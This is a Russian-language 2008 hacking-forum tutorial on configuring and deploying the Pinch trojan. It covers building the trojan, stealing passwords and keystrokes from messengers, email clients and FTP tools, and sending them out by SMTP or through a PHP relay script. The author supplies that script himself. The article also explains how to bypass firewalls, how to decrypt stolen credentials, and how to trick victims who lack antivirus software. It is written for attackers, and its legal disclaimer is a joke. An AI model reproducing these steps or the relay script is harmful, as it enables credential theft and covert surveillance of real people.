Инструкция по Pinch
Как правильно настроить и использовать Pinch? Terabyte
🕛 17.04.2008, 17:54
=====Intro
=====
Прошу не удивляться, что я решил написать подобную статью (article for lamerzzz). Дело в том, что на моем форуме (http://forum.web-hack.ru) примерно раз в три дня создается тема, вроде "Как правильно настроить и использовать Pinch?", "Как пользоваться Pinch`ем?" и т.д.
===========
Возможности
===========
Данный троян получил довольно большое распространение в 2003/2004 году. Все благодаря возможности красть большое кол-во паролей (ICQ99b-2003a/Lite/ICQ2003Pro, Miranda IM, Trillian ICQ&AIM, &RQ, The Bat!, The Bat! 2, Outlook/Outlook Express, IE autocomplete & protected sites & ftp (9x/ME/2000/XP), FAR Manager (ftp), Win/Total Commander (ftp), RAS (9x/Me/2k/xp supported)), маленькому весу, открытым исходникам и легкостью создания троя для конкретной задачи. Троян имеет следующие возможности:
- Отправлять конфигурацию компьютера жертвы: ОС, оператика, CPU, HDD, logged user, host name, IP
- Шпион клавиатуры (Key-log)
- Удаленная консоль (Remote console)
- Обход Firewall`а
- Отправка всех паролей на E-mail используя SMTP-сервер
- Шифрование украденных паролей пересылаемых по почте
- Автоудаление трояна после запуска
- HTML/Text отчеты
- Размер файла примерно 10Kb
- Модульная система
- И многое другое...
Троян написал coban2k (http://www.cobans.net) - довольно известный человек в мире ICQ-хакинга. По причине проблем с хостингом по поводу хранения трояна на их сервере, автор был вынужден убрать это творение с своего сайта. К сожалению уже почти все антивирусы находят этот трой и его можно впарить только жертве, у которой не стоит антивируса. Хотя есть и много способов спрятать Pinch от антивирусов.
============
Комплектация
============
В архив (pinch_1.0.zip) с трояном входят следующие папки и файлы:
\PinchBuilder.exe - мастер для создания трояна
\Parser.exe - программа для расшифровки закодированных писем с паролями
\readme.txt - без комментариев
\Pinch\ - главная папка с asm-исходниками трояна и компилятором
\Sources\ - остальные исходники
\TB!2 Plugin (Auto-parser)\ - папка с плагином для The Bat 2!, который декодирует зашифрованные письма с паролями, приходящими на ваш почтовый ящик
\Sources\Script\ - PHP-скрипт, через который отсылаются пароли при выборе соответствующей опции при компиляции (читайте далее)
================
Компилируем трой
================
В комплекте поставляется специальный мастер (PinchBuilder.exe), который и занимается созданием трояна по вашим требованиям и компиляцией трояна прямо на вашем компьютере. Программа имеет две главные вкладки: Compile и Decrypt. Первая служит для создания трояна, а вторая для расшифровки паролей (по сути эта вкладка является результатом работы файла Parser.exe). Далее идут три под-вкладки: SMTP, HTTP и FILE. В них задаются вариант вывода паролей. Разберем каждую подробнее:
====
SMTP
====
В поле Server вводим адрес (hostname/ip) SMTP-сервера. Если вы ввели домен сервера, то нажмите Resolve, чтобы домен сервера принял вид IP-адреса. Далее в полях From и To указываем свое мыло. Кнопка Send test massage служит для тестовой отправки письма, через настройки указанные вами. Настоятельно рекомендую ей воспользоваться. Если письмо не приходит, то это значит, что есть какие то проблемы с отправкой (включенный фаерволл, плохой SMTP, не нажали на Resolve и т.д.).
Хочу заметить, что последнее время большинство провайдеров переходят на систему, по которой их клиенты могут отправить письма ТОЛЬКО с ИХ SMTP-вервера. В таких случаях рекомендую пользоваться методом отправки писем, через HTTP.
====
HTTP
====
Закачиваем файл \Sources\Script\view.php на сервер поддерживающий PHP-скрипты и исполняющие функцию mail(). Далее в поле URL указываем путь к этому скрипту (например, http://site/pinch.php). В поле Subject указываем имя темы, с которой будут оправляться письма. В поле Status check str должна находиться строка, которая выдается скриптом после его загрузки. В скрипте идущем в комплекте с троем оно имеет значение: _ret_ok_1 :
HTML
<script language="JavaScript">
window.status="_ret_ok_1";
</script>
Если данное значение не будет принято трояном, то он будет пытаться отправить письмо через этот скрипт каждую минуту, пока не получит в ответ строку из поля Status check str. Я вам рекомендую использовать скрипт не из стандартной поставки, а написанный мной:
HTML
<html><body>
<?php
// Author: Terabyte (http://www.web-hack.ru)
$email=$_POST['a'];
$subject=$_POST['b'];
$msg=$_POST['c'];
if (isset($email) and isset($subject) and isset($msg)) {
mail($email,$subject,$msg, "From: $email");}
?>
<script language="JavaScript">
window.status="_ret_ok_1";
</script>
</body></html>
Делает он почти тоже самое, но более грамотно написан. Огромным плюсом при использовании данного метода отправки паролей являеся, тот факт, что он позволяет отправлять пароли в обход Firewall`а. Как это достигается? Вот вырезка из лога outpost`а в момент отправки пароля через скрипт с моего сайта:
Имя процесса: iexplorer.exe
Протокол: HTTP
Удаленный адрес: www.web-hack.ru
Я думаю все поняли, кто не в танке =) Так же из плюсов я могу я могу выделить возможность записывать зашифрованные письма на вашем сайте, а не отправлять на мыло; возможность менять мыло на которое отсылаются пароли, на случай если его удалят; при массовой рассылке троя (чтобы пароли могли быть отправлены даже с тех провайдеров, где отключен доступ ко всем SMTP-серверам, кроме их него)
====
FILE
====
На данный вкладке задается путь к файлу, в который сохранятся все пароли. Для этого в поле Path надо записать путь к файл (например, C:\password.txt).
================
Compiler Options
================
В данной области все понятно, тут надо просто поставить галочки в тех полях, где вам это требуется. Стоит обратиться внимание на поле Add Icon. В нем указывает путь к иконке с которой будет отображаться скомпилированный троян. Хочу заметить что на моей системе (Windows XP) мне так и не удалось скомпилировать троя с этой включенной опцией и ее пришлось отключить.
В полях Protocol указываем метод, которым будут отправляться пароли (SMTP/HTTP/FILE). Далее нажимаем кнопку Compile и должна пойти компиляция трояна, который сохранится в основную папку с мастером для его создания.
===================
Расшифровка паролей
===================
Допустим вам удалось впарить ламеру этот трой и вам на мыло пришли пароли с машины жертвы. Дело в том, что при пересылке пароли шифруются и их для начала надо расшифровать (если у вас не установлен специальный плагин к TheBat! описанный выше). Копируем в буфер обмена текст с закодированными паролями, открываем Parser.exe (или вкладку Decrypt в PinchBuilder.exe) и нажимаем в контекстном меню пунк Process Data (или просто нажимаем комбинацию клавиш Alt+C). Далее программа выдаст вам все данные украденные у жертвы с удобном виде. Далее вы можете их сохранить или распечатать.
==========
Заключение
==========
Хочу вас предостеречь, что при использовании данного трояна вы сразу попадает под 273 статью УК РФ и можете быть серьезно наказаны ;-) Я (автор статьи) не несу никакой ответственности за вред, который может быть нанесен каким либо лицам после прочтения моей статьи.
PS: обсуждение статьи проходит у меня на форуме (http://forum.web-hack.ru/index.php?showtopic=7291).